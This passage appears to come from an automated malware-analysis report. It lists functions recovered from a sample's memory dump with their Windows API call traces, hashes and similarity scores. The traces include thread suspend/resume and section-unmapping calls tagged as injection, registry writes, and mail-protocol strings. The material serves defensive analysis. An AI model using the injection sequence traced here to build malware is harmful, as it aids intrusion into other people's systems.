    • Part of subcall function 001CB978: GetLastError.KERNEL32 ref: 001CBA3F
  • CloseHandle.KERNEL32(?), ref: 001CBC9E
    • Part of subcall function 001CBB13: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CBB31
    • Part of subcall function 001CBB13: HeapFree.KERNEL32(00000000,00000000), ref: 001CBB84
  • FlushFileBuffers.KERNEL32(?), ref: 001CBC73
  • DisconnectNamedPipe.KERNEL32(?,?,?,00000010,00000000), ref: 001CBC7C
  • WaitForSingleObject.KERNEL32(001EB094,00000000), ref: 001CBC89
  • GetLastError.KERNEL32 ref: 001CBCAB
  • CloseHandle.KERNEL32(?), ref: 001CBCB8
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DB838, Relevance: 15.1, APIs: 10, Instructions: 64 Total matches: 62sleepsynchronization
Similarity
  • Total matches: 62
  • API ID: CloseHandle$LocalFreeRtlDeleteCriticalSectionRtlEnterCriticalSectionRtlLeaveCriticalSectionSetEventSleepWaitForSingleObject
  • String ID:
  • API String ID: 1546928802-0
  • Opcode ID: 44cbb82d1bc8bc2d29e416fe044868003d437d2d6ba21b65bae40637e45a7bca
  • Instruction ID: 191c3ac2f4053567846d1cc33e924360c7a86817a4ea2a5247009256dd1e7f80
  • Opcode Fuzzy Hash: 18E02BA421196647D99708B00461B1FAE82BBE23E484C3303F552A25C2BB0712C4DF2A
  • Instruction Fuzzy Hash: 191c3ac2f4053567846d1cc33e924360c7a86817a4ea2a5247009256dd1e7f80
APIs
  • SetEvent.KERNEL32(?,001C1F1A,?,001EB068,?,00000000,001C13EB), ref: 001DB84C
    • Part of subcall function 001DAF5A: InterlockedExchange.KERNEL32(001C13EB,000000FF), ref: 001DAF61
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 001DB866
  • CloseHandle.KERNEL32(?), ref: 001DB86F
  • CloseHandle.KERNEL32(?), ref: 001DB87D
  • RtlEnterCriticalSection.NTDLL(00000008), ref: 001DB889
  • RtlLeaveCriticalSection.NTDLL(00000008), ref: 001DB8B2
  • Sleep.KERNEL32(000001F4), ref: 001DB8C1
  • CloseHandle.KERNEL32(?), ref: 001DB8CE
  • LocalFree.KERNEL32(?), ref: 001DB8DC
  • RtlDeleteCriticalSection.NTDLL(00000008), ref: 001DB8E6
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DF75B, Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 172 Total matches: 23string
Similarity
  • Total matches: 23
  • API ID: LocalFreelstrcatlstrcpymemcpy
  • String ID: IMAP$P$POP3$SMTP
  • API String ID: 2001391702-3667654339
  • Opcode ID: 43434d26df3a4f5d7c34ecf30ecc38ca90c9099c92fdaea40e4787011e532f06
  • Instruction ID: 6478c962306ff3ebee45f1e70cc600bc5173ee11dde7fe85537008a4b3b65a8d
  • Opcode Fuzzy Hash: 3911AF310449E3F79AAB229950026AB81429F117E2E5C9B21ED7C785CF6F03B14B770D
  • Instruction Fuzzy Hash: 6478c962306ff3ebee45f1e70cc600bc5173ee11dde7fe85537008a4b3b65a8d
APIs
  • lstrcpyW.KERNEL32(00000000,001ED5A0), ref: 001DF84B
  • lstrcatW.KERNEL32(00000000,00000000), ref: 001DF853
  • memcpy.NTDLL(00000000,?,00000000,-00000002), ref: 001DF8F1
  • LocalFree.KERNEL32(?,-00000002), ref: 001DF908
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
    • Part of subcall function 001D93F1: lstrlenW.KERNEL32(00000000,00000000,001EAC44), ref: 001D9401
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DAFC4, Relevance: 13.8, APIs: 9, Instructions: 278 Total matches: 59memorythread
Similarity
  • Total matches: 59
  • API ID: GetLastError$VirtualAlloc$RtlEnterCriticalSectionRtlLeaveCriticalSectionSwitchToThread
  • String ID:
  • API String ID: 2452875170-0
  • Opcode ID: f7250d7c747c6724e85bc87f4a1d164c9bcb3d791413c0bfd27e5859a3665385
  • Instruction ID: e9cda0ef1bba535e69377ecfbf93933b7da227d9232d932a7ffe86fd6aa33c96
  • Opcode Fuzzy Hash: F931CCA2419FC2A7D5936A400890BBAC5C3FB12FF6D6CA732B674A02C81FC5274D2F54
  • Instruction Fuzzy Hash: e9cda0ef1bba535e69377ecfbf93933b7da227d9232d932a7ffe86fd6aa33c96
APIs
  • VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 001DB03B
  • VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 001DB05A
  • GetLastError.KERNEL32 ref: 001DB20B
  • GetLastError.KERNEL32 ref: 001DB28D
  • SwitchToThread.KERNEL32(?,?,?,?), ref: 001DB2D2
    • Part of subcall function 001DAF5A: InterlockedExchange.KERNEL32(001C13EB,000000FF), ref: 001DAF61
  • GetLastError.KERNEL32 ref: 001DB308
  • GetLastError.KERNEL32 ref: 001DB317
  • RtlEnterCriticalSection.NTDLL(?), ref: 001DB327
  • RtlLeaveCriticalSection.NTDLL(?), ref: 001DB338
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CAC3A, Relevance: 13.6, APIs: 9, Instructions: 124 Total matches: 61memorystring
Similarity
  • Total matches: 61
  • API ID: memcpy$RtlAllocateHeapmemset$HeapFreelstrcmpi
  • String ID:
  • API String ID: 2612869081-0
  • Opcode ID: c2dacee3140373e500c22aac8ec47d9c8ec65dfe813f0c9f26dc5badd2c4d201
  • Instruction ID: 2a6ed72f7be82828a989acab500aa79ad59f26800ec0c1f59594e6530e87086a
  • Opcode Fuzzy Hash: 4201C028044DC281C42710841061FF9A506EFD13B5C8CAB76DDA13F08B5D0273F53797
  • Instruction Fuzzy Hash: 2a6ed72f7be82828a989acab500aa79ad59f26800ec0c1f59594e6530e87086a
APIs
    • Part of subcall function 001C57CC: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C57D4
    • Part of subcall function 001C57CC: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C57E9
    • Part of subcall function 001C57CC: InterlockedIncrement.KERNEL32(0000001C), ref: 001C5802
  • RtlAllocateHeap.NTDLL(00000000,00000018,001ED278), ref: 001CAC70
  • memset.NTDLL ref: 001CAC81
  • lstrcmpi.KERNEL32(?,?), ref: 001CACC1
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001CACEA
  • memcpy.NTDLL(00000000,?,?), ref: 001CACFE
  • memset.NTDLL ref: 001CAD0B
  • memcpy.NTDLL(?,?,?,?,00000000,?,00000000,?,?), ref: 001CAD24
  • memcpy.NTDLL(-00000005,001EC42B,00000007,?,?,?,?,00000000,?,00000000,?,?), ref: 001CAD3F
  • HeapFree.KERNEL32(00000000,?), ref: 001CAD5C
    • Part of subcall function 001C7AF2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 001C7B06
    • Part of subcall function 001C7AF2: memcpy.NTDLL(00000000,001C7C21,?,?,00000008,?,001C7C21,00000000,00000000,?), ref: 001C7B2F
    • Part of subcall function 001C7AF2: RegCloseKey.ADVAPI32(?,?,001C7C21,00000000,00000000,?,?,?,?,?,?,?,?,00000008,001C77AB,00000000), ref: 001C7B81
    • Part of subcall function 001C5761: InterlockedDecrement.KERNEL32(0000001C), ref: 001C5765
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CB593, Relevance: 13.6, APIs: 9, Instructions: 115 Total matches: 61memorystring
Similarity
  • Total matches: 61
  • API ID: RtlAllocateHeaplstrlen$HeapFree_wcsuprlstrcatlstrcpymemcpy
  • String ID:
  • API String ID: 1573093752-0
  • Opcode ID: f08ef74051028bad1df3046b05b27150d2409501bab8048f9561d94f45d3640f
  • Instruction ID: 49f792a003b958594b94fef63a2c1694da6c43edfde979eb277695decca324f2
  • Opcode Fuzzy Hash: F9F0FEB01D1901DB8023453EE06037DE502AC442E2B1C8617FD80B525F7F4372E0BF59
  • Instruction Fuzzy Hash: 49f792a003b958594b94fef63a2c1694da6c43edfde979eb277695decca324f2
APIs
  • lstrlenW.KERNEL32(00000000), ref: 001CB606
  • RtlAllocateHeap.NTDLL(00000000,001EAC82), ref: 001CB61C
  • memcpy.NTDLL(00000000,00000000,001EAC80), ref: 001CB62F
  • _wcsupr.NTDLL ref: 001CB63A
  • lstrlenW.KERNEL32(?,001EAC80), ref: 001CB66C
  • RtlAllocateHeap.NTDLL(00000000,?,001EAC80), ref: 001CB681
  • lstrcpyW.KERNEL32(00000000,?), ref: 001CB697
  • lstrcatW.KERNEL32(00000000,001EC940), ref: 001CB6B5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CB6C4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C164D, Relevance: 13.6, APIs: 9, Instructions: 89 Total matches: 49memoryregistrystring
Similarity
  • Total matches: 49
  • API ID: GetTickCountHeapFreeRegCloseKeyRegCreateKeyRtlAllocateHeapRtlImageNtHeaderStrRChrlstrlenwsprintf
  • String ID:
  • API String ID: 473458267-0
  • Opcode ID: 21cd21af9a4aaeb0892998a3b8bf2ca0770d14e129f35d2f1317603fddf0a3d6
  • Instruction ID: 233c1588e08a29c017db756c2c3cc83d8e7a4f483530507245655a67d20bfa99
  • Opcode Fuzzy Hash: 82F05935850C435DC06788E5483AB3BE6417B002D8DDC6A33F9416D2066F8332969B6B
  • Instruction Fuzzy Hash: 233c1588e08a29c017db756c2c3cc83d8e7a4f483530507245655a67d20bfa99
APIs
  • RtlImageNtHeader.NTDLL(?), ref: 001C165E
  • RtlAllocateHeap.NTDLL(00000000,00000011), ref: 001C1685
  • GetTickCount.KERNEL32 ref: 001C169C
  • wsprintfA.USER32 ref: 001C16AC
  • RegCreateKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C16E0
  • StrRChrA.SHLWAPI(00000000,00000000,00000000), ref: 001C16F8
  • lstrlen.KERNEL32(00000000), ref: 001C1702
  • RegCloseKey.ADVAPI32(?), ref: 001C171E
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C172C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CB978, Relevance: 13.6, APIs: 9, Instructions: 82 Total matches: 110file
Similarity
  • Total matches: 110
  • API ID: GetLastError$CancelIoCloseHandleCreateEventGetOverlappedResultReadFileWaitForMultipleObjectsWriteFile
  • String ID:
  • API String ID: 340323113-0
  • Opcode ID: c76374ab722defcc6b7910d2b5a917f55ad2d99158a8d4548ff4996c05cdb32e
  • Instruction ID: 4663223eb685f44cb7c3c2feaea3cf8fb5c10da6263795c37b1e1976f57e1679
  • Opcode Fuzzy Hash: B7E05C3D03050183442319B00225F9BAF186F662C7A8C33E2FE84CD6975B01BBE58152
  • Instruction Fuzzy Hash: 4663223eb685f44cb7c3c2feaea3cf8fb5c10da6263795c37b1e1976f57e1679
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000001,00000000,001CBA84,00000008,?,00000010,00000001,00000000,0000012B), ref: 001CB997
  • WriteFile.KERNEL32(?,00000001,?,?,?), ref: 001CB9CB
  • ReadFile.KERNEL32(?,00000001,?,?,?), ref: 001CB9D3
  • GetLastError.KERNEL32 ref: 001CB9DD
  • WaitForMultipleObjects.KERNEL32(00000002,00000000,00000000,00002710), ref: 001CB9F9
  • GetOverlappedResult.KERNEL32(?,?,?,00000000), ref: 001CBA12
  • CancelIo.KERNEL32(?), ref: 001CBA27
  • CloseHandle.KERNEL32(?), ref: 001CBA37
  • GetLastError.KERNEL32 ref: 001CBA3F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DC371, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 109 Total matches: 97threadsynchronizationinjection
Similarity
  • Total matches: 97
  • API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset
  • String ID: d
  • API String ID: 307323562-2564639436
  • Opcode ID: 3424cbb1137d2442c81198497add0441f4db132d4a2ce8cb8b6f8920268ef235
  • Instruction ID: b8db2ac21e3ce66b9afee30e9f9d0f5fd3c10acb7799db9a356edd2bebb0603d
  • Opcode Fuzzy Hash: 76018E064AAA7143C6022C158545FBAF186EB03FB9C5CF710D560304CE0B4574E1F669
  • Instruction Fuzzy Hash: b8db2ac21e3ce66b9afee30e9f9d0f5fd3c10acb7799db9a356edd2bebb0603d
APIs
  • memset.NTDLL ref: 001DC393
    • Part of subcall function 001D8325: GetModuleHandleA.KERNEL32(001EC01D,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D833F
    • Part of subcall function 001D8325: GetProcAddress.KERNEL32(00000000,001EDA66,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D8350
    • Part of subcall function 001D8325: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D836D
    • Part of subcall function 001D8325: IsWow64Process.KERNELBASE(00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D837E
    • Part of subcall function 001D8325: CloseHandle.KERNEL32(00000000), ref: 001D8391
    • Part of subcall function 001D90C0: RtlNtStatusToDosError.NTDLL(C0000002), ref: 001D90ED
    • Part of subcall function 001D90C0: SetLastError.KERNEL32(00000000,?,001DC3F5,00000000,?,00010007,00000004,?), ref: 001D90F4
  • ResumeThread.KERNEL32(?,00000000,?,?,00000000,?,00010007,00000004,?), ref: 001DC42A
  • WaitForSingleObject.KERNEL32(00000064), ref: 001DC438
  • SuspendThread.KERNEL32(?), ref: 001DC450
    • Part of subcall function 001D909F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D90B7
    • Part of subcall function 001DC212: memset.NTDLL ref: 001DC240
    • Part of subcall function 001DC212: ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 001DC2CA
    • Part of subcall function 001DC212: WaitForSingleObject.KERNEL32(00000064), ref: 001DC2D8
    • Part of subcall function 001DC212: SuspendThread.KERNEL32(?), ref: 001DC2EB
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
  • GetLastError.KERNEL32(00000000,?,00010007,00000004,?), ref: 001DC4C5
  • ResumeThread.KERNEL32(00000004), ref: 001DC4D6
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C3996, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 105 Total matches: 51registryfilememory
Similarity
  • Total matches: 51
  • API ID: CreateFileGetLastErrorHeapFreeRegCloseKeyRegOpenKey
  • String ID: [FILE]$[FILE]
  • API String ID: 3351174444-3230400787
  • Opcode ID: 033c4394e70e99a6bf63e685e4473468f8b4c093a00da4e8f42c8e7bfe120adf
  • Instruction ID: 2fcb9902772c4c4d4bc9c17d65ab76f3f424010ff8a5c77d50f6198a202490f7
  • Opcode Fuzzy Hash: 85F0DD3A594EC3CFD423249020157BAC805FB412E2CAD2716EA807E1C16F8333192F17
  • Instruction Fuzzy Hash: 2fcb9902772c4c4d4bc9c17d65ab76f3f424010ff8a5c77d50f6198a202490f7
APIs
  • RegOpenKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C39AA
    • Part of subcall function 001D9A9C: RegCloseKey.ADVAPI32(?,00000000), ref: 001D9B23
    • Part of subcall function 001D9EAA: lstrlenW.KERNEL32(00000000,00000000,00000000,.dll,001C2B1B,00000000,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001D9EB8
    • Part of subcall function 001D9EAA: lstrlen.KERNEL32(DllRegisterServer), ref: 001D9EC6
    • Part of subcall function 001D9EAA: RtlAllocateHeap.NTDLL(00000000,00000022), ref: 001D9EDB
    • Part of subcall function 001D95E9: lstrlenW.KERNEL32(?,00000000,001EAC80,?,?,?,001C1784,00000000,?,001C17F3,?,?,?,?,00000000), ref: 001D95F5
    • Part of subcall function 001D95E9: memcpy.NTDLL(00000000,?,00000000,00000002,?,?,?,001C1784,00000000,?,001C17F3,?,?,?,?,00000000), ref: 001D961D
    • Part of subcall function 001D95E9: memset.NTDLL ref: 001D962F
    • Part of subcall function 001C28FD: RegOpenKeyA.ADVAPI32(80000001,001EC2F4,00000000), ref: 001C2917
    • Part of subcall function 001C28FD: lstrcmpiW.KERNEL32(00001000,00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000), ref: 001C294D
    • Part of subcall function 001C28FD: lstrlenW.KERNEL32(00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000), ref: 001C295A
    • Part of subcall function 001C28FD: RegCloseKey.ADVAPI32(00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C29B0
  • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 001C3A90
  • GetLastError.KERNEL32 ref: 001C3A9B
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C3AB0
  • RegCloseKey.ADVAPI32(?,?,?,?,?), ref: 001C3AC1
    • Part of subcall function 001C29BF: RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C29D8
    • Part of subcall function 001C29BF: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,001C2A7A,00000000), ref: 001C2A06
    • Part of subcall function 001C29BF: lstrlenW.KERNEL32(00000000,?,?,001C2A7A,00000000), ref: 001C2A12
    • Part of subcall function 001C29BF: HeapFree.KERNEL32(00000000,00000000), ref: 001C2A2A
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C27F6, Relevance: 12.1, APIs: 8, Instructions: 52 Total matches: 80registry
Similarity
  • Total matches: 80
  • API ID: GetLastError$CloseHandleDuplicateHandleOpenProcessRegCloseKeyRegCreateKeyRegOpenKey
  • String ID:
  • API String ID: 3239362136-0
  • Opcode ID: 43d6ef705f251b34ef39b149b3ea3bd8fb900b51b25fecf4a76b54cbc8c7a116
  • Instruction ID: 43568bf06b197137d00305a6dda9a24464bc0a833492d0823832902715db9840
  • Opcode Fuzzy Hash: 4CD0C2B8000985CF04479878487AAFFEA01BEC21C155C5A72F9C06824F769172DF0B6B
  • Instruction Fuzzy Hash: 43568bf06b197137d00305a6dda9a24464bc0a833492d0823832902715db9840
APIs
  • OpenProcess.KERNEL32(00000040,00000000,?), ref: 001C2802
  • RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 001C2820
  • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 001C2828
  • DuplicateHandle.KERNEL32(?,00000000,?,00000000,00000000,00000002), ref: 001C2846
  • GetLastError.KERNEL32 ref: 001C285A
  • RegCloseKey.ADVAPI32(?), ref: 001C2865
  • CloseHandle.KERNEL32(00000000), ref: 001C286C
  • GetLastError.KERNEL32 ref: 001C2874
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CDCEC, Relevance: 10.7, APIs: 7, Instructions: 161 Total matches: 54memorythreadsleep
Similarity
  • Total matches: 54
  • API ID: GetCurrentThreadGetCurrentThreadIdRtlAllocateHeapRtlEnterCriticalSectionRtlLeaveCriticalSectionSleepmemset
  • String ID:
  • API String ID: 2472442912-0
  • Opcode ID: dc49271e526c1696018041de0017b0827111101275221657691e75393d626545
  • Instruction ID: a1ba47e9cb500db2a87726f60fc19047a378d35199e4f4ec398e997f9554d1b5
  • Opcode Fuzzy Hash: AA11AD32257B7013C12B648249A877EFA85F7420DBC8C7610FAA43906D1F4792D05F7A
  • Instruction Fuzzy Hash: a1ba47e9cb500db2a87726f60fc19047a378d35199e4f4ec398e997f9554d1b5
APIs
  • RtlAllocateHeap.NTDLL ref: 001CDD25
  • memset.NTDLL ref: 001CDD39
    • Part of subcall function 001C3C55: RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
    • Part of subcall function 001C3C55: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
    • Part of subcall function 001C3C55: HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
    • Part of subcall function 001C3C55: RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
  • GetCurrentThreadId.KERNEL32(?,00001000,00001000,?), ref: 001CDDC8
  • GetCurrentThread.KERNEL32 ref: 001CDDDB
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
  • RtlEnterCriticalSection.NTDLL(001EB184), ref: 001CDE7E
  • Sleep.KERNEL32(0000000A), ref: 001CDE88
  • RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001CDEAE
    • Part of subcall function 001CDCA5: NtUnmapViewOfSection.NTDLL(079007F4), ref: 001CDCCE
    • Part of subcall function 001CDCA5: RtlNtStatusToDosError.NTDLL(00000000), ref: 001CDCD5
    • Part of subcall function 001CDCA5: HeapFree.KERNEL32(00000000,00000000,079007F4), ref: 001CDCE4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C9D54, Relevance: 10.6, APIs: 7, Instructions: 144 Total matches: 54memoryregistry
Similarity
  • Total matches: 54
  • API ID: HeapFree$RegCloseKeyRegCreateKey
  • String ID:
  • API String ID: 3276616890-0
  • Opcode ID: b82f1d124a686c0fba74e06d606f12bbe42e9b5bf24afcb4d9ffa1ad41822641
  • Instruction ID: c57badf541bd68534790deaa67724b48a31e467339e930acdbfe2d3de4c2c09d
  • Opcode Fuzzy Hash: 4A118C6A048DC253C06778C5B1BB7F5C412BB82CD0C4D1363FEA46D65C6E8372D66B02
  • Instruction Fuzzy Hash: c57badf541bd68534790deaa67724b48a31e467339e930acdbfe2d3de4c2c09d
APIs
  • RegCreateKeyA.ADVAPI32(80000001,?), ref: 001C9DC7
  • HeapFree.KERNEL32(00000000,?), ref: 001C9E08
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C9E18
  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,001CA93B,00000000,?,?,?), ref: 001C9EA8
    • Part of subcall function 001C9BEF: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C9C4A
    • Part of subcall function 001C9BEF: RtlReAllocateHeap.NTDLL(00000000,00000000,8B50F445,?), ref: 001C9C75
    • Part of subcall function 001C9BEF: memcpy.NTDLL(00000000,00000000,00000000,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9C94
    • Part of subcall function 001C9BEF: HeapFree.KERNEL32(00000000,00000000), ref: 001C9CF5
    • Part of subcall function 001C9BEF: memcpy.NTDLL(?,00000000,001E5048,00000000,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048), ref: 001C9D17
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C9E84
    • Part of subcall function 001C947B: lstrlen.KERNEL32(?,001E5048,00000000), ref: 001C94A0
    • Part of subcall function 001C947B: wsprintfA.USER32 ref: 001C94E0
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C9514
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C954D
    • Part of subcall function 001C947B: memcpy.NTDLL(?,001EB23B,-000000FA), ref: 001C95B0
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,?,001EB240), ref: 001C95FF
    • Part of subcall function 001C947B: memcpy.NTDLL(?,?,00000000), ref: 001C9619
    • Part of subcall function 001C947B: memcpy.NTDLL(?,00000000,001CAB3A), ref: 001C9638
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C964E
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C9672
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C96B4
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C96D3
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,00000008,-000000F7,?,?,?,?,001EC448,?,?,001CAB3A,001E5048,00000000), ref: 001C96F2
    • Part of subcall function 001C947B: StrChrA.SHLWAPI(00000000,0000003B), ref: 001C9708
    • Part of subcall function 001C947B: StrToIntExA.SHLWAPI(00000001,00000000,?), ref: 001C971D
    • Part of subcall function 001C947B: memmove.NTDLL(00000000,00000000,001CAB3A,?,?,?,?,?,?,?,001EC448,?,?,001CAB3A,001E5048,00000000), ref: 001C9742
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C978D
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C97A9
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,001EB239,-00000008,?,?,?,?,?,?,?,?,001EC448,?,?,001CAB3A,001E5048), ref: 001C97C8
    • Part of subcall function 001C947B: StrChrA.SHLWAPI(00000000,0000002C), ref: 001C97DB
    • Part of subcall function 001C947B: StrTrimA.SHLWAPI(00000000,001E53C4), ref: 001C97F4
    • Part of subcall function 001C947B: StrTrimA.SHLWAPI(?,001E53C4), ref: 001C9802
    • Part of subcall function 001C947B: StrToIntExA.SHLWAPI(00000000,00000000,?), ref: 001C9811
    • Part of subcall function 001C947B: StrToIntExA.SHLWAPI(?,00000000,?), ref: 001C982C
    • Part of subcall function 001C947B: memmove.NTDLL(001EB240,00000000,001CAB3A,?,?,?,?,?,?,?,?,?,?,?,001EC448,?), ref: 001C9860
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C98AC
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C98C8
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,001EB239,-00000008,?,?,?,?,?,?,?,?,?,?,?,?,001EC448), ref: 001C98E7
    • Part of subcall function 001C947B: memmove.NTDLL(001EB240,00000000,001CAB3A,00000000,00000001), ref: 001C992A
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C9976
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C9992
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,001EB23B,-00000006), ref: 001C99B1
    • Part of subcall function 001C947B: memmove.NTDLL(001EB240,00000000,001CAB3A), ref: 001C99E6
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C9A25
  • HeapFree.KERNEL32(00000000,?), ref: 001C9ECD
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C9EE2
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D9692, Relevance: 10.6, APIs: 7, Instructions: 138 Total matches: 53string
Similarity
  • Total matches: 53
  • API ID: StrTrim$_struprlstrlenmemcpymemset
  • String ID:
  • API String ID: 2209883122-0
  • Opcode ID: 64815d0257e3aa2b83c4ddbe6b14a35168a99daac82a04345423b0ec2bb7509c
  • Instruction ID: f0f5b9b59e6fe8333f99bd5133ddb9f513826102a63fc73ea14bdac57d814e19
  • Opcode Fuzzy Hash: E3018E5665E5F0D1C122289F4818335F842EF806EF719BA259C637068EBE0342607FE9
  • Instruction Fuzzy Hash: f0f5b9b59e6fe8333f99bd5133ddb9f513826102a63fc73ea14bdac57d814e19
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memset.NTDLL ref: 001D96C0
